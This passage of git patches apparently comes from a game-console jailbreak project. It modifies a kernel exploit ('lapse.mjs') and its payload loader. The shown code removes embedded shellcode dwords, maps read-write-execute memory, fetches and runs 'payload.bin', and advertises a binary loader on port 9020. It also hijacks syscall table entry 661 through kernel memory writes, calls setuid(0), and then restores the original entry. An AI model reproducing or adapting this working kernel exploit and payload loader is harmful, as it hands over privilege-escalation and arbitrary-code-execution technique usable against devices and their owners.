- BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
- BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
- BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
- BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
- BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
- BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
- BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
- BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
- BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
- BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
- BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
- BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
- BLDR[60] = 0xC3050FCA;
-
- chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
-
- var pthread = malloc(0x10);
- sysi('mlock', payload_buffer, 0x300000);
-
- call_nze(
- 'pthread_create',
- pthread,
- 0,
- payload_loader,
- payload_buffer
- );
-
- log('BinLoader is ready. Send a payload to port 9020 now');
-}
-
-//For some reason this payload loader version does KP.
-/*kexploit().then(() => {
- var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
- var payload_loader = new View4(window.pld);
- chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
- const ctx = new Buffer(0x10);
- const pthread = new Pointer();
- pthread.ctx = ctx;
-
- call_nze(
- 'pthread_create',
- pthread.addr,
- 0,
- payload_loader.addr,
- payload_buffer,
- );
-})*/
-
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
@@ -1827,7 +1807,9 @@ function malloc32(sz) {
return ptr;
}
+
kexploit().then(() => {
+
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
diff --git a/payload.js b/payload.js
index 1ba4d7f..f6a82e5 100644
--- a/payload.js
+++ b/payload.js
@@ -1,7 +1,6 @@
if (sessionStorage.getItem('jbsuccess')) {
sessionStorage.setItem('binloader', 1);
} else {
- sessionStorage.removeItem('binloader');
fetch('./payload.bin').then(res => {
res.arrayBuffer().then(arr => {
window.pld = new Uint32Array(arr);
@@ -9,4 +8,3 @@ if (sessionStorage.getItem('jbsuccess')) {
})
})
}
-
From f07c1eab5916fc09cc94c336b8a0a35ae12e74f0 Mon Sep 17 00:00:00 2001
From: Nazky <56560636+Nazky@users.noreply.github.com>
Date: Thu, 29 May 2025 21:04:57 +0200
Subject: [PATCH 4/4] Update lapse.mjs
---
lapse.mjs | 9 +++++++++
1 file changed, 9 insertions(+)
mode change 100755 => 100644 lapse.mjs
diff --git a/lapse.mjs b/lapse.mjs
old mode 100755
new mode 100644
index 73afe82..39441a0
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1505,6 +1505,9 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
// sysent[661] is unimplemented so free for use
const offset_sysent_661 = 0x1107f00;
const sysent_661 = kbase.add(offset_sysent_661);
+ const sy_narg = kmem.read32(sysent_661);
+ const sy_call = kmem.read64(sysent_661.add(8));
+ const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
// .sy_narg = 6
kmem.write32(sysent_661, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1594,6 +1597,12 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
log('setuid(0)');
sysi('setuid', 0);
log('kernel exploit succeeded!');
+ log('restore sys_aio_submit()');
+ kmem.write32(sysent_661, sy_narg);
+ // .sy_call = gadgets['jmp qword ptr [rsi]']
+ kmem.write64(sysent_661.add(8), sy_call);
+ // .sy_thrcnt = SY_THR_STATIC
+ kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
alert("kernel exploit succeeded!");
}